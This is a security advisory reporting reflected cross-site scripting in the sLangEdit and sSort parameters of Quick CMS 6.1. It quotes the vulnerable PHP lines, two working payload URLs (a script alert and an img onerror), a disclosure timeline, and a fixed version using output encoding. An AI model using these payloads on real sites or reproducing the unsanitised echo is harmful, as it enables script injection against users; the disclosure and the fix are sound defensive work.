Quick CMS 6.1 Cross Site Scripting

2016.01.20
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

## FULL DISCLOSURE

#Product : Quick CMS
#Exploit Author : Rahul Pratap Singh
#Version : 6.1
#Home page Link : http://opensolution.org/home.html
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 19/Jan/2016

XSS Vulnerability:
----------------------------------------
Description:
----------------------------------------
The "sLangEdit" and "sSort" parameters are not sanitized before being echoed back into the page, which leads to reflected XSS.

----------------------------------------
Vulnerable Code:
----------------------------------------
File Name: languages.php
Found at line: 23
<h1><?php echo $lang['Languages'].( isset( $_GET['sLangEdit'] ) ? ' '.$_GET['sLangEdit'] : null ); ?></h1>

File Name: pages.php
Found at line: 49
<form action="?p=pages<?php if( isset( $_GET['sSort'] ) ) echo '&amp;sSort='.$_GET['sSort']; ?>" name="form" method="post" class="main-form">

----------------------------------------
Exploit:
----------------------------------------
localhost/Quick.Cms_v6.1-en/admin.php?p=languages&sLangEdit=</h1><script>alert("XSS")</script><h1>
localhost/Quick.Cms_v6.1-en/admin.php?p=pages&sSort="><img%20src=x%20onerror=confirm(1)><!--

----------------------------------------
POC:
----------------------------------------
https://0x62626262.files.wordpress.com/2016/01/quick-cms-v6-1xsspoc.png
https://0x62626262.files.wordpress.com/2016/01/quick-cms-v6-1xsspoc2.png

Disclosure Timeline:
Tried to contact vendor via email : 14/1/2016 (email bounced back)
Tried to contact vendor via forum : 18/1/2016 (thread deleted, no response)
Public Disclosure: 19/1/2016

Pub ref: https://0x62626262.wordpress.com/2016/01/19/quick-cms-v-6-1-xss-vulnerability
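Both sinks above write a raw query parameter into HTML: one into element content, one into an attribute value. The following is an added example (not Quick CMS code) showing the same two output sites with output encoding applied; the helper name `h()`, the `$lang` array contents and the `$allowedSort` list are assumptions for illustration.

```php
<?php
// Added example, not from the Quick CMS codebase. Encodes request parameters
// before they reach the HTML response at the two sinks named in the advisory.

// Encode a value for an HTML text or attribute context. ENT_QUOTES covers both
// quote styles, so the same helper is safe inside action="...".
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Assumed stand-in for the CMS language array.
$lang = ['Languages' => 'Languages'];

// languages.php, line 23: the edited language name is reflected into an <h1>.
// Vulnerable form:  echo $lang['Languages'].( isset($_GET['sLangEdit']) ? ' '.$_GET['sLangEdit'] : null );
// A "</h1><script>" payload is now emitted as "&lt;/h1&gt;&lt;script&gt;" and
// rendered as text rather than parsed as markup.
$sLangEdit = isset($_GET['sLangEdit']) ? (string) $_GET['sLangEdit'] : '';
?>
<h1><?php echo h($lang['Languages']).($sLangEdit !== '' ? ' '.h($sLangEdit) : ''); ?></h1>

<?php
// pages.php, line 49: the sort key is reflected into the form's action attribute.
// Vulnerable form:  echo '&amp;sSort='.$_GET['sSort'];
// Sort keys come from a fixed set, so an allow-list (constructed here, not the
// real Quick CMS list) is applied first; anything else falls back to no sort.
// rawurlencode() keeps the value a valid query component and h() keeps the
// attribute context intact, so a '">' payload can no longer close the attribute.
$allowedSort = ['name', 'date', 'position'];
$sSort = isset($_GET['sSort']) && in_array($_GET['sSort'], $allowedSort, true)
    ? $_GET['sSort']
    : null;
?>
<form action="?p=pages<?php if ($sSort !== null) echo '&amp;sSort='.h(rawurlencode($sSort)); ?>"
      name="form" method="post" class="main-form">
```

Encoding at the output site is the fix that matches CWE-79; the allow-list on `sSort` is an additional, stricter check that is only possible because the parameter has a small fixed domain.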

References:

https://0x62626262.files.wordpress.com/2016/01/quick-cms-v6-1xsspoc.png
https://0x62626262.files.wordpress.com/2016/01/quick-cms-v6-1xsspoc2.png
https://0x62626262.wordpress.com/2016/01/19/quick-cms-v-6-1-xss-vulnerability



Copyright 2024, cxsecurity.com
